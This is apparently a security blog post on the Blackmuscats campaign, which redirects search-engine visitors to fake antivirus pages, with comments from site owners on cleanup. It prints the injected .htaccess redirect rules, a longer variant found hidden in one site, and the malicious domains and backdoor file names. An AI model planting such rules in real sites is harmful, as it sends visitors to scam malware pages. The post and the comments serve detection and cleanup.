Blackmuscats Conditional Redirections to Fake AntiVirus

We are seeing many sites today compromised with the Blackmuscats conditional redirection. This malware causes anyone visiting the hacked site to be redirected to a Fake AV (AntiVirus). Why Blackmuscats? All the compromised sites have .htaccess redirections pointing to files ending in “blackmuscats?5”.

So far we have detected more than 8,000 sites with this type of redirection and the number is growing (last night we had only found a few hundred).

Note: this is a conditional redirection, so you are only sent to the malware site if you are coming from a search engine, not if you visit the site directly.

Here are some of the domains being used as part of this malware campaign:

1297 redirections http://my-supas.ru/blackmuscats?5
1156 redirections http://moisupas.ru/blackmuscats?5
1077 redirections http://moi-supas.ru/blackmuscats?5
1001 redirections http://mysupas.ru/blackmuscats?5
975 redirections http://moi-supa.ru/blackmuscats?5
391 redirections http://my-supa.ru/blackmuscats?5
329 redirections http://supa-web.ru/blackmuscats?5
263 redirections http://my-supas.ru/blackmuscats?5
244 redirections http://moisupas.ru/blackmuscats?5
223 redirections http://moi-supas.ru/blackmuscats?5
206 redirections http://mysupas.ru/blackmuscats?5
192 redirections http://moi-supa.ru/blackmuscats?5
80 redirections http://my-supa.ru/blackmuscats?5
65 redirections http://supa-web.ru/blackmuscats?5
.. many more..

This is what the .htaccess looks like on the hacked sites:

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|..suchmaschine|web-archiv|infospace).(.*)
RewriteRule ^(.*)$ http://moisupas.ru/blackmuscats?5 [R=301,L]

What happens next?

So what happens next? If someone visits a compromised sites by clicking on a search engine results page, they will be sent to one of those domains we listed above, and then to www1.antivirusworrydanger.pl (and similar AV related domains):

http://nashi-fitnes.ru/azebrise/niklas.php (212.71.10.196) -> redirection to ->
http://www1.antivirusworrydanger.pl/370l3591/al/1fedfba29dd0193d/pr2/0/ (37.221.161.3)

This is where you get those scary warnings like “Your computer is compromised”.

We will post more details as we keep monitoring it.

24 comments
  1.  I was the victim of this attack, my site is no longer accessible. what should I do please?

  2. My websites were infected, it started a few days ago. It seems like after I clean it up, it reappears. I must not be getting the root, it’s like some kind of flash virus.

    1. Same here, cleaning .htaccess solved problem temporariliy.  If you find root, could you please kindly post it here?

  3. same by me… five sites under attack.   i did not find the issue… editing htaccess fixed temporary. google report it as spam site..

  4. i use joomla and have this on my site..but can’t find anything wrong in the .htaccess file something interesting is that it redirects me to https://google.com not to any other sites. Can anyone tell me how to fix this

    1.  I have to same problem on two sites that I worked on yesterday. I know wish I hadn’t…

  5. i deleted .htaccess files but they apeared again… anytime after couple of time

    1.  i tried to delete the .htaccess files and now in redirects me even when i type the url directly not only in google etc. the interesting thing for my site is that it redirects me to google.com not any other site

  6. I was hacked for couple of day’s ago.

    I found that there were a security issue with a component “com_jce” and i removed it and installed a newer version.

    I also found a couple of files in:
    images/stories/.cache_pchuyx.php
    images/stories/story.php

    I removed them and now everything seems to work again. I hope!

    No more hacked .htaccess file.

    1. Thank you so much for posting this.  I found the story.php and a similar .cache_xxx.php file (the string of letters was different for me).  So far it seems deleting these files does stop the htaccess re-writes.  Thank you again for sharing what you found.

      1.  Ok, nice. But you have to check if you have any component that is outdated. There may be a security hole there for the hackers to get in. They got in the first time, now you have to prevent a second time.

        1. Like you, there was an outdated JCE component on the site with the malicious .php files.  In the process of updating everything right now, all passwords have already been changed.  The hardest part was finding the malicious code, and your post helped greatly with that.  Thanks again.

  7. Thank you! A search for “.cache” revealed the source of my .htaccess issues. Never was a fan of Joomla, but now will turn people away who want it.

  8. Thanks, saved me a lot of trouble finfding the infection.

    For info this is what I found in my htaccess file – in white so it was hidden! Hope it helps.

    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace).(.*)

    RewriteRule ^(.*)$ http://earthlinkunadorned.info/Foundation?8 [R=301,L]

    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*)

    RewriteRule ^(.*)$ http://earthlinkunadorned.info/Foundation?8 [R=301,L]

  9. I found codes in .htaccess file and deleted it but still appears after 1-2 hours later. I could not find “.cache_pchuyx.php” or story.php file. I also uninstalled “com_jce” component, still redirects…. please help me… this is infected my 6-7 websites… Thanks

  10. To fix the redirection problems due to malwares there is a solution

Comments are closed.

You May Also Like